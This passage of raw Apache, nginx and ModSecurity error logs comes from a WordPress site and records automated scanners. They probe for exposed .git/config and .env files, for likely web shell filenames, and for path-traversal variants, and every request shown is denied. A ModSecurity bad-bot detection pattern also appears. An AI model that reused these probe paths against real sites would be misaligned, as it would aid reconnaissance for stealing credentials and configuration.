"OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0tPpxg1HQEU_r5FNtEQrwAAAIg"], referer: https://investigacionperu.com/xmlrpc.php [Sat Nov 30 17:19:53.450734 2024] [authz_core:error] [pid 21904:tid 140531640289024] [client 64.225.75.246:34594] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/30 17:19:57 [error] 21250#21250: *210219 access forbidden by rule, client: 64.225.75.246, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/30 18:39:11 [error] 21250#21250: *210740 access forbidden by rule, client: 18.215.237.93, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sat Nov 30 20:33:47.800877 2024] [autoindex:error] [pid 21289:tid 140531589932800] [client 84.247.150.132:38488] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Sat Nov 30 20:33:51.592273 2024] [autoindex:error] [pid 21289:tid 140531782080256] [client 84.247.150.132:38498] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Sat Nov 30 20:34:00.329707 2024] [autoindex:error] [pid 21289:tid 140531765294848] [client 84.247.150.132:38520] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Sat Nov 30 20:34:01.729680 2024] [autoindex:error] [pid 21289:tid 140531531183872] [client 84.247.150.132:38524] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Sat Nov 30 20:34:01.961778 2024] [:error] [pid 21288:tid 140531531183872] [client 84.247.150.132:38526] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Sat Nov 30 20:34:06.653005 2024] [autoindex:error] [pid 21904:tid 140531598325504] [client 84.247.150.132:38534] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Sat Nov 30 20:34:13.016624 2024] [autoindex:error] [pid 21288:tid 140531631896320] [client 84.247.150.132:38546] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Sat Nov 30 20:34:27.791457 2024] [autoindex:error] [pid 21288:tid 140531765294848] [client 84.247.150.132:38574] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Sat Nov 30 20:34:30.338399 2024] [autoindex:error] [pid 21904:tid 140531790472960] [client 84.247.150.132:38580] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Sat Nov 30 20:34:31.687735 2024] [autoindex:error] [pid 21289:tid 140531539576576] [client 84.247.150.132:38584] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Sat Nov 30 20:34:36.959827 2024] [autoindex:error] [pid 21288:tid 140531623503616] [client 84.247.150.132:38594] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Nov 30 20:34:56.273061 2024] [autoindex:error] [pid 21288:tid 140531631896320] [client 84.247.150.132:38632] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php 2024/11/30 20:35:15 [error] 21250#21250: *213259 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 84.247.150.132, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" [Sat Nov 30 20:35:21.293952 2024] [autoindex:error] [pid 21289:tid 140531581540096] [client 84.247.150.132:38672] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Sat Nov 30 20:35:24.140231 2024] [autoindex:error] [pid 21288:tid 140531547969280] [client 84.247.150.132:38678] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Nov 30 20:35:34.616771 2024] [autoindex:error] [pid 21288:tid 140531539576576] [client 84.247.150.132:38696] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Sat Nov 30 20:35:39.747395 2024] [:error] [pid 21289:tid 140531589932800] [client 84.247.150.132:38712] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Nov 30 20:35:57.179272 2024] [autoindex:error] [pid 21287:tid 140531623503616] [client 84.247.150.132:38744] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Sat Nov 30 20:35:58.576793 2024] [autoindex:error] [pid 21904:tid 140531589932800] [client 84.247.150.132:38748] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Sat Nov 30 20:37:07.277286 2024] [:error] [pid 21287:tid 140531547969280] [client 84.247.150.132:38878] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Sat Nov 30 20:37:11.536087 2024] [autoindex:error] [pid 21904:tid 140531756902144] [client 84.247.150.132:38894] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Sat Nov 30 20:37:31.802428 2024] [:error] [pid 21289:tid 140531773687552] [client 84.247.150.132:38928] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat Nov 30 20:37:41.465160 2024] [autoindex:error] [pid 21288:tid 140531748509440] [client 84.247.150.132:38948] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Sat Nov 30 20:37:41.695800 2024] [:error] [pid 21288:tid 140531790472960] [client 84.247.150.132:38950] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Nov 30 20:37:46.475166 2024] [:error] [pid 21904:tid 140531631896320] [client 84.247.150.132:38964] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php [Sat Nov 30 20:37:46.704465 2024] [:error] [pid 21904:tid 140531556361984] [client 84.247.150.132:38966] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Sat Nov 30 20:37:53.989293 2024] [:error] [pid 21289:tid 140531773687552] [client 84.247.150.132:38988] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Nov 30 20:38:19.120320 2024] [autoindex:error] [pid 21289:tid 140531606718208] [client 84.247.150.132:39032] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/11/30 20:38:33 [error] 21250#21250: *213259 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 84.247.150.132, server: investigacionperu.com, request: "GET /.well-known/pki-validation/?p= HTTP/1.1", host: "investigacionperu.com" [Sun Dec 01 00:06:16.913946 2024] [:error] [pid 21289:tid 140531556361984] [client 3.73.1.50:41178] [client 3.73.1.50] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.investigacionperu.com"] [uri "/.env"] [unique_id "Z0vuyBg1HQEU_r5FNtET5AAAAJQ"] [Sun Dec 01 15:40:15.927199 2024] [autoindex:error] [pid 21832:tid 139708122208000] [client 4.240.17.223:55144] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Dec 01 18:53:40.933638 2024] [:error] [pid 21776:tid 139708105422592] [client 176.123.7.98:57018] [client 176.123.7.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "Microsoft URL Control"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-emoji-release.min.js"] [unique_id "Z0z3BKW3mtIORo7F7-oOmQAAARM"] [Sun Dec 01 19:44:45.085776 2024] [:error] [pid 21832:tid 139708097029888] [client 3.15.161.7:58012] [client 3.15.161.7] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/api/.env"] [unique_id "Z00C_ZxXxDRqMZQf-dMGfAAAAVQ"] [Sun Dec 01 19:53:33.560475 2024] [:error] [pid 21832:tid 139708222920448] [client 128.199.248.75:58150] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-conflg.php 2024/12/01 21:00:51 [error] 20350#20350: *227983 access forbidden by rule, client: 52.215.183.215, server: investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "investigacionperu.com" 2024/12/01 21:00:51 [error] 20350#20350: *227984 access forbidden by rule, client: 52.215.183.215, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/12/01 21:38:10 [error] 20350#20350: *228150 access forbidden by rule, client: 79.120.76.144, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/12/01 21:45:57 [error] 20350#20350: *228182 access forbidden by rule, client: 15.152.148.228, server: cpanel.investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/01 21:45:58 [error] 20351#20351: *228183 access forbidden by rule, client: 15.152.148.228, server: cpanel.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Dec 02 01:24:29.842258 2024] [authz_core:error] [pid 21832:tid 139708231313152] [client 46.101.1.225:34336] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/02 01:24:35 [error] 20351#20351: *230923 access forbidden by rule, client: 46.101.1.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Dec 02 01:45:03.673919 2024] [:error] [pid 21832:tid 139708138993408] [client 45.134.225.130:34558] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php, referer: www.google.com [Mon Dec 02 01:56:55.853827 2024] [autoindex:error] [pid 20387:tid 139708180956928] [client 45.134.225.130:34654] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Dec 02 01:56:56.527739 2024] [autoindex:error] [pid 20389:tid 139708113815296] [client 45.134.225.130:34656] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Dec 02 01:57:01.389635 2024] [autoindex:error] [pid 20389:tid 139708105422592] [client 45.134.225.130:34670] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/12/02 01:57:06 [error] 20351#20351: *231147 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 45.134.225.130, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2024/12/02 01:57:07 [error] 20351#20351: *231148 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 45.134.225.130, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Mon Dec 02 01:57:08.059911 2024] [autoindex:error] [pid 20714:tid 139708180956928] [client 45.134.225.130:34672] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Dec 02 04:28:38.272652 2024] [autoindex:error] [pid 6702:tid 140420638095104] [client 213.136.78.38:36488] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Dec 02 11:23:34.650617 2024] [autoindex:error] [pid 6130:tid 140420524795648] [client 128.199.22.192:47264] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Dec 02 12:17:37.208768 2024] [:error] [pid 6702:tid 140420524795648] [client 45.134.225.130:48852] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Dec 02 12:17:38.105218 2024] [:error] [pid 6132:tid 140420499617536] [client 45.134.225.130:48854] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Dec 02 16:55:53.896720 2024] [autoindex:error] [pid 6131:tid 140420449261312] [client 154.38.168.64:59476] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/12/02 17:08:59 [error] 6094#6094: *246891 access forbidden by rule, client: 3.80.108.241, server: mail.investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "mail.investigacionperu.com" 2024/12/02 17:08:59 [error] 6093#6093: *246892 access forbidden by rule, client: 3.80.108.241, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2024/12/02 17:22:07 [error] 6093#6093: *247116 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /static../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247117 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /images../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247118 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /img../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247119 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /css../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247120 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /content../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247121 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /events../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247122 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /media../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247123 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /lib../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247124 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /scripts/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247125 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /js/libs/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247126 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /source/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247127 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247128 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /js../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247129 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247130 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /config/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247131 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /backend/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247132 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /panel/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247133 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /themes/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247134 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /template/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247135 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /templates/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247136 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /views/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247137 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /layout/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247138 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /media/uploads/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247139 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /files/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247140 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /resources/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247141 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /modules/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247142 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /plugins/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247143 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /extensions/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247144 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /drupal/sites/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247145 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /prestashop/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247146 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /docs/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247147 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /documentation/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247148 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /data/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247149 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /database/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6093#6093: *247150 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /lib/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:08 [error] 6094#6094: *247151 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /bower_components/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:09 [error] 